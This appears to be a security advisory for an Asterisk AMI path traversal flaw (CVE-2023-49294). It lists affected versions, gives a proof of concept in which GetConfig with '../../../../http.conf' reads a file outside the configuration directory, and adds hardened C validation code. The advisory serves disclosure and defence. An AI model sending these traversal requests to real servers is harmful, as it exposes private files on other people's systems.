Headline
CVE-2023-49294: Path traversal via AMI GetConfig allows access to outside files
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file via the AMI GetConfig action even when the live_dangerously option is not enabled: the action refuses absolute paths, but not relative paths containing "..", so a filename such as ../../../../http.conf escapes the Asterisk configuration directory. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk 18.9-cert6, contain a fix for this issue.
Package
asterisk (Asterisk)
Affected versions
<= 18.20.0
<= 20.5.0
= 21.0.0
Patched versions
18.20.1
20.5.1
21.0.1
certified-asterisk (Asterisk)
Affected versions
< 18.9-cert6
Patched versions
18.9-cert6
Summary
It is possible to read any arbitrary file (any file the Asterisk process can read) via the AMI GetConfig action, even when live_dangerously is not enabled, by passing a relative filename that traverses out of the configuration directory with "..".
Details
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
https://owasp.org/www-community/attacks/Path_Traversal
https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757
PoC
The setup step copies http.conf to the filesystem root so that there is a known file outside the Asterisk configuration directory to read back:
cp /config/asterisk/default/http.conf /
An absolute path is denied, as expected:
Action: GetConfig
Filename: /http.conf
ActionID: 09235013
Response: Error
ActionID: 09235013
Message: File requires escalated priveledges
A relative path that climbs out of the configuration directory is not denied, and the contents of the copied /http.conf are returned:
Action: GetConfig
Filename: ../../../../http.conf
ActionID: 09235015
Response: Success
ActionID: 09235015
Category-000000: general
Line-000000-000000: enabled=yes
Line-000000-000001: bindaddr=[::]
Line-000000-000002: bindport=8088
Line-000000-000003: tlsenable=yes
Line-000000-000004: tlsbindaddr=[::]:8089
Line-000000-000005: tlscertfile=/etc/asterisk/keys/fullchain.pem
Line-000000-000006: tlsprivatekey=/etc/asterisk/keys/privkey.pem
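The PoC shows the distinction that matters: a leading "/" is refused, but nothing stops ".." from walking out of the configuration directory. The following C is an added example written for this advisory, not Asterisk's own code; it contrasts an absolute-path-only check with one that normalises the joined path and requires it to remain under the configuration directory (assumed here to be /etc/asterisk; the function names are hypothetical):

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumption for this example: the default Asterisk configuration directory. */
#define CONFIG_DIR "/etc/asterisk"

/*
 * Illustrative shape of a check that only refuses absolute paths (not the
 * project's code): with live_dangerously off, "/http.conf" is rejected but
 * "../../../../http.conf" is accepted, which is the behaviour the PoC shows.
 */
bool naive_getconfig_allowed(const char *fn, bool live_dangerously)
{
    if (live_dangerously) {
        return true;
    }
    return fn[0] != '/';
}

/*
 * Hardened check: join fn onto CONFIG_DIR, lexically normalise ".", ".." and
 * repeated slashes, then accept only if the result is still strictly below
 * CONFIG_DIR. On success the normalised absolute path is written to out.
 * Returns false for absolute input, any climb above "/", escape from
 * CONFIG_DIR, or an output buffer that is too small.
 */
bool getconfig_path_in_config_dir(const char *fn, char *out, size_t outlen)
{
    char joined[4096];
    const char *segs[256];
    size_t nseg = 0;
    size_t used = 0;
    const size_t dlen = strlen(CONFIG_DIR);

    if (fn[0] == '/') {
        return false; /* absolute paths are never acceptable here */
    }
    if (snprintf(joined, sizeof joined, "%s/%s", CONFIG_DIR, fn)
        >= (int)sizeof joined) {
        return false;
    }

    /* Collapse the path into a segment stack: ".." pops, "." is dropped. */
    for (char *seg = strtok(joined, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0) {
            continue;
        }
        if (strcmp(seg, "..") == 0) {
            if (nseg == 0) {
                return false; /* tried to climb above the filesystem root */
            }
            nseg--;
            continue;
        }
        if (nseg == sizeof segs / sizeof segs[0]) {
            return false; /* unreasonably deep path */
        }
        segs[nseg++] = seg;
    }

    /* Rebuild the normalised absolute path. */
    out[0] = '\0';
    for (size_t i = 0; i < nseg; i++) {
        int n = snprintf(out + used, outlen - used, "/%s", segs[i]);
        if (n < 0 || (size_t)n >= outlen - used) {
            return false;
        }
        used += (size_t)n;
    }

    /* Containment: CONFIG_DIR followed by '/' and at least one more segment. */
    return strncmp(out, CONFIG_DIR, dlen) == 0 && out[dlen] == '/';
}

/* Convenience wrapper: does fn pass the hardened check and resolve to expected? */
bool getconfig_resolves_to(const char *fn, const char *expected)
{
    char out[4096];

    return getconfig_path_in_config_dir(fn, out, sizeof out)
        && strcmp(out, expected) == 0;
}

int main(void)
{
    /* Constructed probe filenames, including the two from the PoC above. */
    const char *probes[] = { "http.conf", "/http.conf", "../../../../http.conf",
                             "../http.conf", "sip.d/../extensions.conf" };
    char out[4096];

    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        bool naive = naive_getconfig_allowed(probes[i], false);
        bool hard = getconfig_path_in_config_dir(probes[i], out, sizeof out);
        printf("%-26s naive=%s hardened=%s %s\n", probes[i],
               naive ? "allow" : "deny", hard ? "allow" : "deny",
               hard ? out : "");
    }
    return 0;
}
```

Lexical normalisation is enough to stop "..", but a symlink inside the configuration directory can still point outside it; where the file exists on disk, resolve both the candidate and the directory with realpath(3) and compare the results rather than relying on the string form alone.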
Impact
Any authenticated AMI user permitted to run GetConfig can read files outside the Asterisk configuration directory, limited only by what the Asterisk process itself is allowed to read, without live_dangerously being enabled. The PoC reads a copy of http.conf from /, but any other path reachable via ".." can be targeted the same way; the content comes back in the parsed Category/Line form shown above.
Related news
Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.